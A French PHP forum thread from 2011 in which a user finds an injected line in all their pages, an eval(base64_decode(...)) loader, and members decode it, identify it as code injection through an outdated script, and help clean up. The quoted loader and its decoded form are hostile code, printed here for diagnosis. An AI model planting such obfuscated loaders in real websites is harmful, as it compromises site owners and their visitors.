2011, site chez free ne fonctionne plus...

Eléphant du PHP | 363 Messages

07 janv. 2011, 11:02

Bonjour et BONNE ANNÉE A TOUTES ET TOUS !!!

Que cette année soit signe de chance, amour, gloire et ...beauté :fete:

Je reviens vers vous car j'ai un site perso hébergé chez free qui a un comportement bizarre.

Le fichier index.php est reconnu mais pas les autres pages. Pourtant celles-ci sont construites de la même façon, elles sont bien présentes physiquement sur le serveur, ma base de données tourne, c'est bizarre comme truc, non ?

Vous avez vent de quelque chose ? Ca peut venir de quoi cette histoire ?

Bien à vous

Foetus69
Dis-donc fossoyeur, t'as une dent contre moi ou quoi ?

Administrateur PHPfrance
Administrateur PHPfrance | 9782 Messages

07 janv. 2011, 12:16

Bonjour,
Le fichier index.php est reconnu mais pas les autres pages.
C'est un peu vague comme description du problème...
Tu as un message d'erreur? un lien à partager qu'on voit le problème?
Quand tout le reste a échoué, lisez le mode d'emploi...

08 janv. 2011, 02:31

Coucou,

J'ai retrouvé ceci dans toutes mes pages php :
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvMTQ0L3NkYi9jLzgvdmxzNzYvcGhwbXYyL2xpYnMvSHRtbC9RdWlja0Zvcm0vUnVsZS9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
C'est quoi ? Comment c'est arrivé là ?

:|

Modérateur PHPfrance
Modérateur PHPfrance | 8758 Messages

08 janv. 2011, 09:00

salut,

en affichant le contenu de la chaine on obtient
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/mnt/*******************/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
eval étant la pour faire fonctionner le tout.

si cela correspond à ton code je dirais qu'il y a eu un script "foireux" qui a mis le brin la dedans.

regarde s'il n'y a pas un script que tu ne connais pas et la date de dernier enregistrement des fichiers (pas la date de dernier accès ;))

@+
Il en faut peu pour être heureux ......

ViPHP
xTG
ViPHP | 7331 Messages

08 janv. 2011, 10:21

Cela ressemble tout simplement à une injection de code. :)
Un petit malin qui a trouvé une faille dans ton code et qui l'a exploité pour y insérer le sien.

Regardes donc le fichier style.css.php et tu devrais y trouver des instructions malhonnêtes. è_é

Administrateur PHPfrance
Administrateur PHPfrance | 9782 Messages

08 janv. 2011, 10:45

Cela ressemble tout simplement à une injection de code. :)
Un petit malin qui a trouvé une faille dans ton code et qui l'a exploité pour y insérer le sien.

Regardes donc le fichier style.css.php et tu devrais y trouver des instructions malhonnêtes. è_é
+1

Je parie que tu as sur ton espace d'hébergement un script PHP clé-en-main qui n'est pas à jour (phpBB, phpMyVisites, Wordpress, etc...)
Quand tout le reste a échoué, lisez le mode d'emploi...

devlop78
Invité n'ayant pas de compte PHPfrance

10 janv. 2011, 02:45

OOo Dommage que ce soit ça, j'aurais tellement voulu sortir

Je reviens vers vous car j'ai un site perso hébergé chez free qui a un comportement bizarre.
Quoi de plus normal ?

:D

11 janv. 2011, 12:21

Bonjour Messieurs,

Oui c'est bien cela, free, moi ou les autres contributeurs FTP avons été victimes d'un trojan.

J'ai fait un annule et remplace massif et ca refonctionne.

Merci de votre aide.

:)